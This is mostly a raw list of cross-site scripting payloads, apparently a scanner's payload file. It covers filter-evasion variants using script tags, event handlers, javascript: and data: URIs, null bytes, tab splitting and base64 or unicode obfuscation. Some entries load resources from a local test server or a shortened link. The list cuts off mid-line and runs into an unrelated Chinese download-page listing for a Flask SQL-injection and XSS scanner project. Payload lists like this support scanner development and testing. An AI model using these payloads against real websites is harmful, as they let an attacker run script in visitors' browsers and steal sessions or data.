<script>alert(\"1\");</script>
<script>alert("1");</script>
<script>alert('1');</script>
<SCRIPT>+alert("KCF");</SCRIPT>
<SCRIPT>+alert("KCF")</SCRIPT>
<script>alert(1)</script>
<script>alert(/KCF/)</script>
' '><script>alert(1)</script>
''><script>alert(1)</script>
<svg><script>varmyvar="text";alert(1)//";</script></svg>
</script><script>alert(1)</script>
<a href="j&#x26#x41;vascript:alert%252831337%2529">KCF</a>
<scr\x00ipt>confirm(1);</scr\x00ipt>
<svg/onload=prompt(1);>
<svg><script>alert(/1/)</script>
<isindex action="javas	cript:alert(1)" type=image>
<form action='data:text/html,<script>alert(1)</script>'><button>CLICK
<form action='java	scri	pt:alert(1)'><button>CLICK
<form action=javascript
:alert(1)><input type=submit>
<form action="javas	cript:alert(1)" method="get"><input type="submit" value="Submit"></form>
<form action="	javas	cript	:alert('KCF :)')" autocomplete="on"> First name:<input type="text" name="fname"><br><input type="submit"></form>
<form id="myform" value="" action=javascript	:eval(document.getElementById('myform').elements[0].value)><textarea>alert(1)</textarea><input type="submit" value="Absenden"></form>
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/KCF/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm(1)"/alt="/"src="/"onerror=eval(id)>'"><img src="http://127.0.0.1:3555/xss_serve_payloads/kcf.jpg">
<script>var url = "<!--<script>";//</script>alert(1)</script>
<form id="myform" value=""+{valueOf:location,length:1,__proto__:[],0:"javascript :alert (1)"}"action=javascript	:eval(document.getElementById('myform').elements[0].value)><textarea>alert(1)</textarea><input type="submit" value="Absenden"></form>
<iframe/src="data:text/html,<svg%09%0A%0B%0C%0D%A0%00%20onload=confirm(1);>">
<svg/contentScriptType=text/vbs><script>Execute(MsgBox(chr(75)&chr(67)&chr(70)))
<img/src='http://127.0.0.1:3555/xss_serve_payloads/kcf.jpg' onmouseover=	prompt(1)
<svg><script>alert( 1)
<embed/src=//goo.gl/nlX0P>
<object/data=//goo.gl/nlX0P>
<iframesrc="javascript:alert(2)">
<iframe/src="data:text/html;	base64
,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=">
<isindexformaction="javascript:alert(1)" type=image>
<input type="image" formaction=JaVaScript:alert(0)>
<form><button formaction=javascript:alert(1)>CLICKME
<form action="Javascript:alert(1)"><input type=submit>
<isindex action="javascript:alert(1)" type=image>
<isindex action=j	a	vas	c	r	ipt:alert(1) type=image>
<isindex action=data:text/html, type=image>
“/><marquee onfinish=confirm(1)>a</marquee>
<object data='data:text/xml,<script xmlns="http://www.w3.org/1999/xhtml ">confirm(1)</script>>'>
<img src= "a" onerror= 'eval(atob("cHJvbXB0KDEpOw=="))'
<script>alert('KCF')</script>=a
<script>document.write(toStaticHTML("<style>div{font-family:rgb('0,0,0)'''}foo');color=expression(alert(1));{}</style><div>POC</div>"))</script>
';!--"<XSS><script>alert(1);</script>={()}
<script>document.body.innerHTML="<a onmouseover%0B=location='\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x61\x6C\x65\x72\x74\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B'><input name=attributes>";</script>
asfunction:getURL,javascript:alert(1)//
\%22))}catch(e){}if(!self.a)self.a=!alert(1)//
"]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;//
0%5C"))%7Dcatch(e)%7Bif(!window.x)%7Bwindow.x=1;alert(1)%7D%7D//
<button/onclick=alert(1) >KCF</button>
<a onmouseover=(alert(1))>KCF</a>
<p/onmouseover=javascript:alert(1); >KCF</p>
<article xmlns="><img src=x onerror=alert(1)"></article>
<article xmlns="x:img src=x onerror=alert(1) ">
<p style="font-family:'\22\3bx:expression(alert(1))/*'">
<svg><style><img src=x onerror=alert(1)></svg>
<listing><img src=x onerror=alert(1)></listing>
"onmouseover=alert(1);a="
'+alert(1)&&null=='
+alert(1)&&null=='
\\\'><script>1<\\/script>
\\\'><body onload=\\\'1\\\'>
\"><script>1<\\/script>
><script>1<\\/script>
\"><body onload=\"1\">
<img src=\"x:kcf\" onerror=\"alert(1)\">
<img src=a onerror=alert(1)
<script>alert(\'1\')</script>
<script>alert(\'\\\\1\\\\\')</script>
<script>alert(\'\\/\\1\\/\\\')</script>
\'\'\">
<scri%00pt>alert(1);</scri%00pt>
<scri\x00pt>alert(1);</scri%00pt>
<s%00c%00r%00%00ip%00t>confirm(1);</s%00c%00r%00%00ip%00t>
<script>alert(1);</script>
<%0ascript>alert(1);</script>
<%0bscript>alert(1);</script>
<!--[if]><script>alert(1)</script -->
<SCRIPT> alert(\"1\");</SCRIPT>
<SCRIPT> alert(\"1\")</SCRIPT>
<script>alert([!![]] [])</script>
<var onmouseover="prompt(1)">KCF</var>
%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80
<input type="text" value=``<div/onmouseover='alert(1)'>X</div>
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe>
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>
<embed code="http://127.0.0.1:3555/xss_serve_payloads/flash.swf" allowscriptaccess=always>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/KCF/)></script
<script itworksinallbrowsers>/*<script* */alert(1)</script
<img src ?itworksonchrome?\/onerror = alert(1)
<meta http-equiv="refresh" content="0; url=data:text/html;blabla,<script>alert(1)</script>">
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
<script/src=data:text/javascript,alert(1)></script>
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
"><img src=x onerror=window.open('http://127.0.0.1:3555/xss_serve_payloads/kcf.html"');>
<table background=javascript:alert(1)></table>
<object/data=//127.0.0.1:3555/xss_serve_payloads/flash.swf
<applet code="javascript:confirm(1);">
<marquee/onstart=confirm(2)>/
<body onload=prompt(1);>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video><source onerror="javascript:alert(1)">
<a onmouseover="javascript:window.onerror=alert;throw 1>
<img src=x onerror="javascript:window.onerror=alert;throw 1">
<body/onload=javascript:window.onerror=eval;throw'=alert\x281\x29';
<img style="xss:expression(alert(1))">
<div style="color:rgb(''&
基于PythonFlaskWeb版网站sqlxss漏洞扫描框架 html + flask + python + mysql
需积分: 0 83 浏览量
2024-05-27
23:38:32
上传
评论 1
收藏 3.62MB RAR 举报
基于PythonFlaskWeb版网站漏洞扫描.rar (72个子文件) 
基于PythonFlaskWeb版网站漏洞扫描 
10.png 50KB 9.png 40KB 3.png 40KB
1x - Copy.jpg 248KB 1t - Copy (2).png 3KB 1t - Copy.png 3KB 1.png 726KB 1x - Copy (2).jpg 248KB 基于PythonFlaskWeb版网站漏洞扫描 .vs 基于PythonFlaskWeb版网站漏洞扫描 v17 
DocumentLayout.json 23KB fileList.bin 212KB .suo 85KB FileContentIndex 1daec852-485c-4991-a7ab-baa481d5a96f.vsidx 3.57MB 基于PythonFlaskWeb版网站漏洞扫描 基于PythonFlaskWeb版网站漏洞扫描.pyproj.user 299B obj Any CPU Debug 
基于PythonFlaskWeb版网站漏洞扫描.pyproj.FileListAbsolute.txt 456B 基于PythonFlaskWeb版网站漏洞扫描.pyproj.CoreCompileInputs.cache 66B Debug 基于PythonFlaskWeb版网站漏洞扫描.pyproj 91KB runserver.py 296B 基于PythonFlaskWeb版网站漏洞扫描 __init__.py 289B viewsUsers.py 3KB payloads sql_base_payloads.txt 112B sql_suffix_payloads.txt 6B sql_number_payloads.txt 36B sql_check_database_payloads.txt 215B sql_blind_payload.txt 81B xss.txt 109KB sql_string_payloads.txt 40B requestsHeadBody postdatas.txt 26B heads.txt 186B dao admin.py 2KB usersVulnerabilitys.py 530B vulnerabilitys.py 422B users.py 522B templates 
login - Copy.html 3KB core systemTool.py 871B myUUIDTool.py 83B mydateTimeTool.py 234B xssTool.py 1KB payloadTool.py 285B sqlTool.py 2KB myhttpTool.py 382B static fonts 
glyphicons-halflings-regular.svg 62KB glyphicons-halflings-regular.ttf 29KB glyphicons-halflings-regular.woff 16KB glyphicons-halflings-regular.eot 14KB scripts bootstrap.js 60KB modernizr-2.6.2.js 52KB jquery.validate-vsdoc.js 44KB bootstrap.min.js 28KB jquery.validate.unobtrusive.min.js 6KB jquery.validate.js 40KB respond.js 10KB respond.min.js 5KB jquery.validate.min.js 21KB jquery.validate.unobtrusive.js 14KB _references.js 396B jquery-1.10.2.min.map 137KB jquery-1.10.2.js 277KB jquery-1.10.2.min.js 92KB jquery-1.10.2.intellisense.js 159KB views.py 4KB requirements.txt 0B 基于PythonFlaskWeb版网站漏洞扫描.sln 1KB 程序设计说明.txt 2KB 11.png 57KB 6.png 130KB 5.png 56KB 4.png 54KB 8.png 37KB 7.png 105KB 2.png 74KB 1t.png 3KB 1x.jpg 248KB资源评论
